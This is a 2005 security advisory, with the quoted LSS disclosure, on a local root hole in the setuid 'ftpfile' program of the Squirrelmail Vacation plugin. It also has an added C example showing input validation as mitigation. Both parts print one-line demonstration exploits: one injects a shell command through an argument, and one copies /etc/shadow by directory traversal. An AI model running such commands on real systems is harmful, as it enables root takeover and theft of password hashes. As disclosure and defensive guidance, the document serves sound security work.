


Category:   Application (E-mail Server)  >   Squirrelmail Vacation Plugin
Vendors:   SquirrelMail Development Team
Squirrelmail Vacation Plugin Lets Local Users Execute Arbitrary Commands With Root Privileges
SecurityTracker Alert ID:  1012866
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 13 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Root access via local system

Version(s): 0.15
Description:   A vulnerability was reported in the Squirrelmail vacation plugin. A local user can view arbitrary files and execute arbitrary commands.

LSS reported that a local user can invoke the 'ftpfile' program to execute arbitrary commands with root privileges. The program, which is configured with set user id (setuid) root user privileges, does not properly validate user-supplied command line arguments before passing them to an execve() call. A demonstration exploit is provided:

ftpfile 0 root 0 get 0 "LSS-Security;id"

A local user can also invoke ftpfile to copy arbitrary files with root privileges to the user's home directory. A demonstration exploit is provided:

ftpfile localhost root root get ../../../../etc/shadow ./shadow

Leon Juranic is credited with discovering this flaw.

The vendor has been notified without response.

The original advisory is available at:

Impact:   A local user can execute arbitrary commands with root privileges.

A local user can copy arbitrary files with root privileges.

Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
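
Both causes listed above (unvalidated arguments reaching a command, and file names accepted with directory traversal) can be closed with the same pattern, shown here as an added example that is not taken from the advisory, the plugin or its vendor: allow-list each file-name argument and run the copy with an argv array instead of a shell. The function names, the allow-list and the use of /bin/cp are assumptions made for illustration.

```c
/* Added example: argument handling for a setuid file helper.
   All names here are hypothetical; this is not the plugin's code. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept one plain file name: [A-Za-z0-9._-] only, so no '/', ';',
   spaces or other shell metacharacters, and no leading '.' or '-'
   (rules out "..", "./x" and option injection such as "-r"). */
int is_safe_name(const char *s)
{
    if (s == NULL || *s == '\0' || *s == '.' || *s == '-' || strlen(s) > 255)
        return 0;
    return s[strspn(s, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                       "0123456789._-")] == '\0';
}

/* Build "home/name" in out only when name passes the allow-list.
   Returns 0 on success, -1 on a rejected name or a too-small buffer.
   A symlink planted at home/name is a separate check (O_NOFOLLOW). */
int path_in_home(const char *home, const char *name, char *out, size_t outlen)
{
    if (!is_safe_name(name))
        return -1;
    int n = snprintf(out, outlen, "%s/%s", home, name);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Copy with an argv array and no shell: each argument reaches cp as
   one literal string. Returns cp's exit status, or -1 on failure. */
int copy_no_shell(const char *src, const char *dst)
{
    char *const argv[] = { "cp", "--", (char *)src, (char *)dst, NULL };
    char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/cp", argv, envp);   /* fixed path, fixed environment */
        _exit(127);                      /* only reached if exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

With these checks, both argument strings from the demonstrations above are rejected before any file is touched or any process is started.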

Message History:   None.

 Source Message Contents

Subject:  Squirrelmail vacation v0.15 local root exploit

			LSS Security Advisory #LSS-2005-01-03


Title			:  Squirrelmail vacation v0.15 local root exploit 
Advisory ID		:  LSS-2005-01-03
Date			:  10.01.2005. 
Advisory URL		:
Impact			:  Privilege escalation and arbitrary file read
Risk level		:  High 
Vulnerability type	:  Local
Vendors contacted	:  No response from vendor


===[ Overview 

Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of 
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:

===[ Vulnerability

Within the Squirrelmail Vacation plugin there is a suid root program 'ftpfile'.
The program is used to access local files in the user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile. 
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.

[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$  ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ 

It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.

$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
[ljuranic@laptop ljuranic]$ 

===[ Affected versions

Squirrelmail Vacation v0.15 and previous versions.

===[ Fix

Not available yet.

===[ PoC Exploit

===[ Credits

Credit for this vulnerability goes to Leon Juranic. 

===[ LSS Security Contact
 LSS Security Team, <eXposed by LSS>
 WWW    :
 E-mail :
 Tel	: +385 1 6129 775

